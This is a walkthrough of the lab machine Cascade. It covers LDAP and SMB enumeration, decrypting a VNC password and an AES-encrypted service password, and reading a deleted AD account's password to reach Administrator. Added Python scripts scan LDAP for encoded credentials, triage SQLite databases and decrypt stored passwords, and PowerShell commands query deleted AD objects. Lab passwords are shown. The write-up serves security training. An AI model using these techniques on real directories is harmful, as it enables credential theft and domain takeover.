Synopsis:
Howdy People, this is a walkthrough of the retired machine Cascade. The box features:
1. LDAP Enumeration.
2. SMB Enumeration.
3. Reverse Engineering.
4. Querying the Deleted AD users.
Scripts/Tools Used:
1. nmap: https://nmap.org/download.html
2. evil-winrm: gem install evil-winrm
3. smbclient: https://pkgs.org/download/smbclient
4. enum4linux: https://github.com/CiscoCXSecurity/enum4linux
5. cutter: https://cutter.re/download/
6. JustDecompile: https://www.telerik.com/download-trial-file/v2/justdecompile
7. dotnetfiddle: https://dotnetfiddle.net
8. VNC password decrypter: https://github.com/trinitronx/vncpasswd.py
1. Portscan:
The port scan shows the usual Active Directory ports open (including LDAP, SMB and WinRM):
2. USER
I started my enumeration with enum4linux and found a list of users; two of them belong to the "Remote Management Users" group, which means we can get a WinRM shell with their credentials.
2.1 Initial Foothold:
As the LDAP port is open, I tried to enumerate the LDAP service manually with Python and found the base64-encoded password of "r.thompson" stored in one of the user's attributes. Follow this link to know more about LDAP enumeration.
Decoding it gives the password:
rY4n5eva.
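The attribute scan behind that find, as an added Python example (it is not the post's own script, nor the linked LDAP guide): dump every user object with all attributes, report any attribute outside a baseline of standard AD user attributes, and try to base64-decode its values, because a custom attribute holding a decodable string is exactly what turned up here. dump_users needs ldap3 and a reachable DC; find_odd_attributes runs offline against SAMPLE_ENTRIES, which is constructed for the example: the DNs and the custom attribute name are assumptions (the page does not show them), and the base64 value is the encoding of the password above.

```python
import base64
import string

# A deliberately short baseline of attributes a normal AD user object carries;
# a real run would load the full list from the schema.  Anything else is worth a look.
BASELINE_USER_ATTRS = {
    "objectClass", "cn", "sn", "givenName", "displayName", "name",
    "distinguishedName", "instanceType", "whenCreated", "whenChanged",
    "uSNCreated", "uSNChanged", "memberOf", "objectGUID", "objectSid",
    "userAccountControl", "badPwdCount", "codePage", "countryCode",
    "badPasswordTime", "lastLogoff", "lastLogon", "lastLogonTimestamp",
    "pwdLastSet", "primaryGroupID", "accountExpires", "logonCount",
    "sAMAccountName", "sAMAccountType", "userPrincipalName",
    "objectCategory", "dSCorePropagationData",
}
PRINTABLE = set(string.printable) - set("\x0b\x0c")

# Constructed sample (assumed DNs and attribute name); the value is the base64
# encoding of the password recovered on the page.
SAMPLE_ENTRIES = [
    ("CN=Ryan Thompson,OU=Users,DC=cascade,DC=local", {
        "cn": ["Ryan Thompson"],
        "sAMAccountName": ["r.thompson"],
        "memberOf": ["CN=IT,OU=Groups,DC=cascade,DC=local"],
        "cascadeLegacyPwd": ["clk0bjVldmE="],
    }),
    ("CN=s.smith,OU=Users,DC=cascade,DC=local", {
        "cn": ["s.smith"],
        "sAMAccountName": ["s.smith"],
        "memberOf": ["CN=Remote Management Users,CN=Builtin,DC=cascade,DC=local"],
    }),
]


def try_base64(value):
    """Return the decoded text if value is strict base64 of printable text, else None."""
    if isinstance(value, bytes):
        value = value.decode("utf-8", "replace")
    if not isinstance(value, str):          # ints, datetimes etc. from ldap3
        return None
    raw = value.strip()
    if not raw or len(raw) % 4:
        return None
    try:
        decoded = base64.b64decode(raw, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return decoded if decoded and set(decoded) <= PRINTABLE else None


def find_odd_attributes(entries, baseline=BASELINE_USER_ATTRS):
    """entries: iterable of (dn, {attribute: [values]}).  Returns a list of
    (dn, attribute, raw_value, decoded) for every value of a non-baseline
    attribute; decoded is None when the value is not base64 text."""
    findings = []
    for dn, attrs in entries:
        for attr, values in attrs.items():
            if attr in baseline:
                continue
            for value in values:
                findings.append((dn, attr, value, try_base64(value)))
    return findings


def dump_users(host, base_dn):
    """Pull every user object with all attributes over an anonymous bind
    (ldap3 assumed installed), in the shape find_odd_attributes() consumes."""
    import ldap3  # imported here so the offline part of this file runs without it
    conn = ldap3.Connection(ldap3.Server(host), auto_bind=True)
    conn.search(base_dn, "(objectClass=user)", attributes=ldap3.ALL_ATTRIBUTES)
    return [(e.entry_dn, dict(e.entry_attributes_as_dict)) for e in conn.entries]


if __name__ == "__main__":
    for dn, attr, raw, decoded in find_odd_attributes(SAMPLE_ENTRIES):
        print(f"{dn}\n  {attr} = {raw!r}" + (f"  -> {decoded!r}" if decoded else ""))
```

Against a live DC you would call find_odd_attributes(dump_users("10.10.10.182", "DC=cascade,DC=local")); the baseline is intentionally incomplete, so expect a few benign extras and read through them rather than trusting the decoder alone.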
2.2 SMB Enumeration:
Next, I looked into the SMB shares accessible to r.thompson and found a meeting note and the hex-encoded VNC password of another user, s.smith. The note is a hint that will help us later.
1. /Data/IT/Email Archives/Meeting_Notes_June_2018.html
2. /Data/IT/temp/s.smith/VNC Install.reg
3. /Data/IT/logs/'Ark AD Recycle Bin'/ArkAdRecycleBin.log
Meeting Note:
ArkAdRecycleBin.log:
From this, I concluded that arksvc can perform operations like deleting users.
VNC Install.reg:
The hex password:
To decrypt the hex, I used the vncpasswd.py script from GitHub (listed above). VNC stores the password DES-encrypted under a fixed, publicly known key, so this registry value is effectively plaintext to anyone who can read the .reg file.
2.3 User.txt
Now I had the password of s.smith, who also belongs to the "Remote Management Users" group, so I took a shell with evil-winrm.
3. ROOT
3.1 SMB Enumeration:
Looking into the shares of s.smith, I found some interesting files :
1. /Audit$/CascAudit.exe
2. /Audit$/CascCrypto.dll
3. /Audit$/DB/Audit.db
Checking the file type of Audit.db with the file command shows it is a SQLite 3.x database. Next, I opened the file with Python's sqlite3 module and went through the tables looking for juicy information.
Alternatively:
Simply running strings on Audit.db is enough to spot the encrypted password of the arksvc user:
strings Audit.db
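Both routes above, the sqlite3 query and the strings dump, come down to the same triage: confirm the file really is SQLite, list its tables, and look at anything that smells like a credential. The block below is an added example (not the post's own script): it performs the header check that the file command does, dumps every table read-only, and flags columns with credential-looking names. The sample database it builds is constructed for the example and its schema is hypothetical, not that of the real Audit.db.

```python
import os
import sqlite3
import tempfile

SQLITE_MAGIC = b"SQLite format 3\x00"   # the 16-byte header `file` keys on
CREDENTIAL_HINTS = ("pwd", "pass", "secret", "key", "token", "hash")


def is_sqlite(path):
    """Same test the file command makes: a SQLite 3 database starts with a fixed header."""
    with open(path, "rb") as fh:
        return fh.read(16) == SQLITE_MAGIC


def triage_sqlite(path, hints=CREDENTIAL_HINTS):
    """Open the file read-only, dump every table, and flag columns whose names
    suggest credentials.  Returns {"tables": {name: {"columns": [...], "rows": [...]}},
    "suspicious": [(table, column, value), ...]}."""
    conn = sqlite3.connect(f"file:{path}?mode=ro", uri=True)
    conn.row_factory = sqlite3.Row
    report = {"tables": {}, "suspicious": []}
    names = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'")]
    for name in names:
        q = name.replace('"', '""')   # table names come from the file, so quote them
        columns = [r[1] for r in conn.execute(f'PRAGMA table_info("{q}")')]
        rows = [dict(r) for r in conn.execute(f'SELECT * FROM "{q}"')]
        report["tables"][name] = {"columns": columns, "rows": rows}
        for col in columns:
            if any(h in col.lower() for h in hints):
                report["suspicious"].extend(
                    (name, col, row[col]) for row in rows if row[col] not in (None, ""))
    conn.close()
    return report


def build_sample_db(path):
    """Constructed stand-in for Audit.db; the schema and rows are hypothetical."""
    conn = sqlite3.connect(path)
    conn.executescript("""
        CREATE TABLE Credentials (Id INTEGER PRIMARY KEY, uname TEXT, pwd TEXT, domain TEXT);
        CREATE TABLE Misc (Id INTEGER PRIMARY KEY, Ext1 TEXT, Ext2 TEXT);
        INSERT INTO Credentials VALUES (1, 'svc-audit', 'AAAAAAAAAAAAAAAAAAAAAA==', 'example.local');
        INSERT INTO Misc VALUES (1, 'x', NULL);
    """)
    conn.commit()
    conn.close()


def demo():
    """Build the sample database in a temp dir, verify the header, and triage it."""
    path = os.path.join(tempfile.mkdtemp(), "Audit.db")
    build_sample_db(path)
    if not is_sqlite(path):
        raise RuntimeError("sample file is not a SQLite database")
    return triage_sqlite(path)


if __name__ == "__main__":
    for table, col, value in demo()["suspicious"]:
        print(f"{table}.{col}: {value}")
```

On a real file you would call triage_sqlite("Audit.db"); a base64-looking string in a pwd column, as here, is the cue to go looking for the code that encrypts it.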
3.2 Reverse Engineering:
Analysing CascAudit.exe in cutter, I found the key:
Key: c4scadek3y654321
Next, decompiling CascCrypto.dll with JustDecompile, I found the EncryptString and DecryptString functions.
I passed the key and the encrypted password to DecryptString (running the decompiled code on dotnetfiddle) and got the password of arksvc.
The password of arksvc:
w3lc0meFr31nd
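Both decryptions on this page, the VNC registry password from section 2.2 and CascCrypto's DecryptString above, are short enough to do in Python rather than reaching for a GitHub script and dotnetfiddle. The block below is an added example, not code from the original post or from the Cascade binaries: vnc_decrypt applies the fixed DES key that VNC implementations share (which is why a VNC password in a .reg file is as good as plaintext), and encrypt_string/decrypt_string mirror the DLL's AES-128-CBC routines with PKCS#7 padding, using the key recovered from CascAudit.exe. The DLL's hard-coded IV is not reproduced on this page, so the IV is a parameter here and DEMO_IV is a made-up value used only for the round-trip self-test. It needs either the cryptography package or pycryptodome.

```python
import base64

# Key recovered from CascAudit.exe (shown on the page).  The matching IV is a
# second hard-coded constant in the DLL that this page does not reproduce, so
# every call takes the IV explicitly; DEMO_IV is made up for the self-test only.
AES_KEY = b"c4scadek3y654321"
DEMO_IV = b"0123456789abcdef"

# Fixed obfuscation key shared by VNC implementations: a public constant, not a secret.
VNC_FIXED_KEY = bytes([0x17, 0x52, 0x6B, 0x06, 0x23, 0x4E, 0x58, 0x07])


def _cbc(algo, key, iv, data, decrypt):
    """Raw CBC with no padding for 'AES' or single 'DES', using the cryptography
    package when present and pycryptodome otherwise (one of them must be installed)."""
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        if algo == "AES":
            alg = algorithms.AES(key)
        else:
            try:  # newer releases file 3DES under 'decrepit'; single DES is 3DES with K1=K2=K3
                from cryptography.hazmat.decrepit.ciphers.algorithms import TripleDES
            except ImportError:
                from cryptography.hazmat.primitives.ciphers.algorithms import TripleDES
            alg = TripleDES(key * 3)
        ctx = Cipher(alg, modes.CBC(iv))
        ctx = ctx.decryptor() if decrypt else ctx.encryptor()
        return ctx.update(data) + ctx.finalize()
    except ImportError:
        from Crypto.Cipher import AES, DES
        mod = AES if algo == "AES" else DES
        ctx = mod.new(key, mod.MODE_CBC, iv)
        return ctx.decrypt(data) if decrypt else ctx.encrypt(data)


def _pkcs7_pad(data, block=16):
    n = block - len(data) % block
    return data + bytes([n]) * n


def _pkcs7_unpad(data, block=16):
    n = data[-1] if data else 0
    if not 1 <= n <= block or data[-n:] != bytes([n]) * n:
        raise ValueError("bad PKCS#7 padding: wrong key, wrong IV or corrupt ciphertext")
    return data[:-n]


def encrypt_string(plaintext, iv, key=AES_KEY):
    """Python equivalent of CascCrypto's EncryptString: AES-128-CBC, PKCS#7, base64 out."""
    if len(key) != 16 or len(iv) != 16:
        raise ValueError("AES-128-CBC needs a 16-byte key and a 16-byte IV")
    ct = _cbc("AES", key, iv, _pkcs7_pad(plaintext.encode("utf-8")), decrypt=False)
    return base64.b64encode(ct).decode("ascii")


def decrypt_string(b64_ciphertext, iv, key=AES_KEY):
    """Python equivalent of CascCrypto's DecryptString: base64 in, UTF-8 string out."""
    if len(key) != 16 or len(iv) != 16:
        raise ValueError("AES-128-CBC needs a 16-byte key and a 16-byte IV")
    pt = _cbc("AES", key, iv, base64.b64decode(b64_ciphertext), decrypt=True)
    return _pkcs7_unpad(pt).decode("utf-8")


def vnc_key():
    """What VNC really feeds to DES: the fixed key with the bits of every byte reversed."""
    return bytes(int(f"{b:08b}"[::-1], 2) for b in VNC_FIXED_KEY)


def vnc_decrypt(reg_value):
    """Decrypt the Password value of a VNC .reg export, e.g. 'hex:6b,cf,...' or bare hex."""
    blob = bytes.fromhex(reg_value.lower().split("hex:")[-1].replace(",", "").replace(" ", ""))
    if not blob or len(blob) % 8:
        raise ValueError("VNC password blob must be a non-empty multiple of 8 bytes")
    key = vnc_key()
    # One DES block per 8 bytes, each with a zero IV, which is identical to the ECB VNC uses.
    plain = b"".join(_cbc("DES", key, bytes(8), blob[i:i + 8], decrypt=True)
                     for i in range(0, len(blob), 8))
    return plain.rstrip(b"\x00").decode("latin-1")


def vnc_encrypt(password):
    """Inverse of vnc_decrypt (VNC keeps at most 8 characters, NUL-padded); returns hex."""
    raw = password.encode("latin-1")[:8].ljust(8, b"\x00")
    return _cbc("DES", vnc_key(), bytes(8), raw, decrypt=False).hex()


if __name__ == "__main__":
    token = encrypt_string("w3lc0meFr31nd", DEMO_IV)
    print(token, "->", decrypt_string(token, DEMO_IV))
    print(vnc_key().hex(), "->", vnc_decrypt(vnc_encrypt("vncPass1")))
```

To reproduce the post, paste the Password line from VNC Install.reg into vnc_decrypt, and feed the base64 string from Audit.db to decrypt_string together with the IV read out of the DLL next to the key. A padding error from decrypt_string almost always means the IV or key is wrong rather than the ciphertext.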
3.3 Root.txt
Remember the note I found in the SMB shares of r.thompson. It clarifies two things:
1. The password of TempAdmin was set to the same as the normal Administrator account.
2. The TempAdmin account has been deleted.
Also, arksvc can delete and query AD users, and its log lives under "Ark AD Recycle Bin", so the deleted account should still be recoverable from the AD Recycle Bin.
So I googled this and found an article on listing deleted AD objects (see References):
# Run from the evil-winrm shell as arksvc. List every deleted user object the AD Recycle Bin still holds:
Get-ADObject -IncludeDeletedObjects -Filter {objectClass -eq "user" -and IsDeleted -eq $True}
# Pull every attribute of the deleted TempAdmin object; this is where the base64-encoded password sits:
Get-ADObject -Filter {displayName -eq "TempAdmin"} -IncludeDeletedObjects -Properties *
The deleted object still carries the same base64-encoded password attribute that leaked r.thompson's password over LDAP. Decoding it gives the plaintext, which, per the note, is also the Administrator password:
Password:
baCT3r1aN00dles
Rooted :)
Thanks for reading.
References:
1. AD Deleted Users: https://blog.stealthbits.com/active-directory-object-recovery-recycle-bin/